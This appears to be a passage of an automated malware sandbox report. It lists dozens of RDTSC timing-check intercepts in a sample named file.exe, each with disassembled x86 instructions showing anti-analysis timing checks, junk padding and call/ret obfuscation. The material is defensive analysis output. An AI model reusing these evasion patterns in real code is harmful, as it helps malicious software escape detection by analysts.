                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1041AB9 second address: 1041ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1041ABD second address: 1041AC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CDE33 second address: 11CDE67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04D4C79EB1h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F04D4C79EB7h 0x00000010 push edx 0x00000011 pop edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CDE67 second address: 11CDE88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F04D4C82A55h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CDE88 second address: 11CDE8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CDE8C second address: 11CDE98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CDE98 second address: 11CDEB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F04D4C79EB8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CE066 second address: 11CE06C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CE82C second address: 11CE830 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0931 second address: 11D0949 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04D4C82A54h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0949 second address: 11D0A04 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F04D4C79EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 07092199h 0x00000013 push 00000003h 0x00000015 mov cl, A6h 0x00000017 jmp 00007F04D4C79EAFh 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 call 00007F04D4C79EA8h 0x00000026 pop esi 0x00000027 mov dword ptr [esp+04h], esi 0x0000002b add dword ptr [esp+04h], 00000014h 0x00000033 inc esi 0x00000034 push esi 0x00000035 ret 0x00000036 pop esi 0x00000037 ret 0x00000038 jmp 00007F04D4C79EB7h 0x0000003d mov dword ptr [ebp+122D1B38h], ebx 0x00000043 push 00000003h 0x00000045 call 00007F04D4C79EB5h 0x0000004a push ebx 0x0000004b jnp 00007F04D4C79EA6h 0x00000051 pop esi 0x00000052 pop esi 0x00000053 call 00007F04D4C79EA9h 0x00000058 jns 00007F04D4C79EB4h 0x0000005e push eax 0x0000005f jmp 00007F04D4C79EB0h 0x00000064 mov eax, dword ptr [esp+04h] 0x00000068 push eax 0x00000069 push edx 0x0000006a pushad 0x0000006b pushad 0x0000006c popad 0x0000006d push eax 0x0000006e pop eax 0x0000006f popad 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0A04 second address: 11D0A0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0A0B second address: 11D0A1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b jc 00007F04D4C79EA6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0A1E second address: 11D0A27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0A27 second address: 11D0A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0A2B second address: 11D0A2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0A2F second address: 11D0AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jmp 00007F04D4C79EB7h 0x00000010 pop eax 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007F04D4C79EA8h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b mov esi, dword ptr [ebp+122D3797h] 0x00000031 mov dword ptr [ebp+1245C745h], esi 0x00000037 lea ebx, dword ptr [ebp+124627E6h] 0x0000003d push 00000000h 0x0000003f push eax 0x00000040 call 00007F04D4C79EA8h 0x00000045 pop eax 0x00000046 mov dword ptr [esp+04h], eax 0x0000004a add dword ptr [esp+04h], 0000001Bh 0x00000052 inc eax 0x00000053 push eax 0x00000054 ret 0x00000055 pop eax 0x00000056 ret 0x00000057 sub di, DAB0h 0x0000005c push eax 0x0000005d pushad 0x0000005e jne 00007F04D4C79EB7h 0x00000064 push eax 0x00000065 push edx 0x00000066 push ecx 0x00000067 pop ecx 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0BC2 second address: 11D0BE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F04D4C82A51h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0BE4 second address: 11D0C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007F04D4C79EA8h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 00000014h 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 lea ebx, dword ptr [ebp+124627EFh] 0x00000027 push 00000000h 0x00000029 push ecx 0x0000002a call 00007F04D4C79EA8h 0x0000002f pop ecx 0x00000030 mov dword ptr [esp+04h], ecx 0x00000034 add dword ptr [esp+04h], 00000014h 0x0000003c inc ecx 0x0000003d push ecx 0x0000003e ret 0x0000003f pop ecx 0x00000040 ret 0x00000041 mov edx, 788F4536h 0x00000046 mov esi, dword ptr [ebp+122D3843h] 0x0000004c push eax 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 push edi 0x00000051 pop edi 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0C3A second address: 11D0C43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0D8E second address: 11D0D94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F026C second address: 11F028A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F04D4C82A55h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F028A second address: 11F0290 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0290 second address: 11F0296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0559 second address: 11F0588 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jns 00007F04D4C79EA6h 0x00000009 jmp 00007F04D4C79EB3h 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 pop ebx 0x00000017 je 00007F04D4C79EAAh 0x0000001d pushad 0x0000001e popad 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F07F2 second address: 11F0807 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F04D4C82A4Ch 0x0000000c jg 00007F04D4C82A46h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0807 second address: 11F080D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0BD2 second address: 11F0BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0D7F second address: 11F0D83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B7D5B second address: 11B7D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B7D64 second address: 11B7D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1ACC second address: 11F1AF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04D4C82A52h 0x00000009 jne 00007F04D4C82A4Eh 0x0000000f push eax 0x00000010 pop eax 0x00000011 jnc 00007F04D4C82A46h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1AF0 second address: 11F1AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007F04D4C79EA6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F6684 second address: 11F668A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F668A second address: 11F6690 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F6690 second address: 11F6694 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F57E7 second address: 11F57EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B6239 second address: 11B6269 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F04D4C82A4Eh 0x0000000c jmp 00007F04D4C82A54h 0x00000011 js 00007F04D4C82A4Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE5A4 second address: 11FE5B0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 je 00007F04D4C79EA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200C29 second address: 1200C47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F04D4C82A51h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200C47 second address: 1200C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200D5C second address: 1200D86 instructions: 0x00000000 rdtsc 0x00000002 je 00007F04D4C82A5Fh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200E62 second address: 1200E83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C79EB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d jnl 00007F04D4C79EA6h 0x00000013 pop edi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200F46 second address: 1200F4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200F4A second address: 1200F50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200F50 second address: 1200F5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F04D4C82A46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120148F second address: 1201493 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120155C second address: 1201562 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1201562 second address: 1201566 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12016F7 second address: 120170F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F04D4C82A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F04D4C82A4Bh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120170F second address: 1201715 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1201715 second address: 1201719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12019C2 second address: 12019D7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F04D4C79EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e je 00007F04D4C79EA6h 0x00000014 pop esi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12019D7 second address: 12019DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12020BA second address: 12020C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12020C3 second address: 1202126 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C82A4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d movsx edi, bx 0x00000010 mov edi, dword ptr [ebp+122D27B4h] 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007F04D4C82A48h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 00000017h 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 movsx edi, ax 0x00000035 push 00000000h 0x00000037 sbb di, ABBCh 0x0000003c xchg eax, ebx 0x0000003d jnc 00007F04D4C82A4Eh 0x00000043 jnc 00007F04D4C82A48h 0x00000049 push eax 0x0000004a pop eax 0x0000004b push eax 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f je 00007F04D4C82A46h 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1202126 second address: 120212A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1203A72 second address: 1203AC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C82A52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F04D4C82A4Ch 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007F04D4C82A48h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e mov dword ptr [ebp+122D284Fh], edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1204612 second address: 120466D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F04D4C79EA8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 push eax 0x00000025 mov di, dx 0x00000028 pop edi 0x00000029 push 00000000h 0x0000002b call 00007F04D4C79EB3h 0x00000030 jno 00007F04D4C79EABh 0x00000036 pop esi 0x00000037 push 00000000h 0x00000039 mov edi, 140F5891h 0x0000003e push eax 0x0000003f push edi 0x00000040 push ecx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12043E9 second address: 12043EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12043EF second address: 1204409 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F04D4C79EACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F04D4C79EA6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12060CA second address: 12060D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12060D2 second address: 12060F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a jg 00007F04D4C79EA6h 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F04D4C79EABh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1206FCB second address: 1206FCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120A731 second address: 120A749 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F04D4C79EA6h 0x00000008 jng 00007F04D4C79EA6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F04D4C79EA6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B2C4D second address: 11B2C56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120DCB2 second address: 120DCD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F04D4C79EB0h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007F04D4C79EA8h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120DCD4 second address: 120DD66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C82A50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F04D4C82A48h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 clc 0x00000025 push 00000000h 0x00000027 jnl 00007F04D4C82A61h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007F04D4C82A48h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 0000001Ch 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 jnl 00007F04D4C82A46h 0x0000004f xchg eax, esi 0x00000050 js 00007F04D4C82A54h 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C549C second address: 11C54BC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F04D4C79EA6h 0x00000008 jmp 00007F04D4C79EB2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120EF32 second address: 120EF36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121240B second address: 12124AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04D4C79EB2h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F04D4C79EB6h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F04D4C79EA8h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov ebx, dword ptr [ebp+122D36FBh] 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+12470F2Bh], ebx 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push eax 0x0000003f call 00007F04D4C79EA8h 0x00000044 pop eax 0x00000045 mov dword ptr [esp+04h], eax 0x00000049 add dword ptr [esp+04h], 0000001Dh 0x00000051 inc eax 0x00000052 push eax 0x00000053 ret 0x00000054 pop eax 0x00000055 ret 0x00000056 jmp 00007F04D4C79EABh 0x0000005b mov edi, dword ptr [ebp+122D19D1h] 0x00000061 push eax 0x00000062 pushad 0x00000063 jbe 00007F04D4C79EACh 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1212681 second address: 121268B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F04D4C82A4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121376F second address: 1213792 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C79EADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F04D4C79EAFh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1214566 second address: 1214570 instructions: 0x00000000 rdtsc 0x00000002 js 00007F04D4C82A4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12145EC second address: 12145F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12145F6 second address: 12145FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
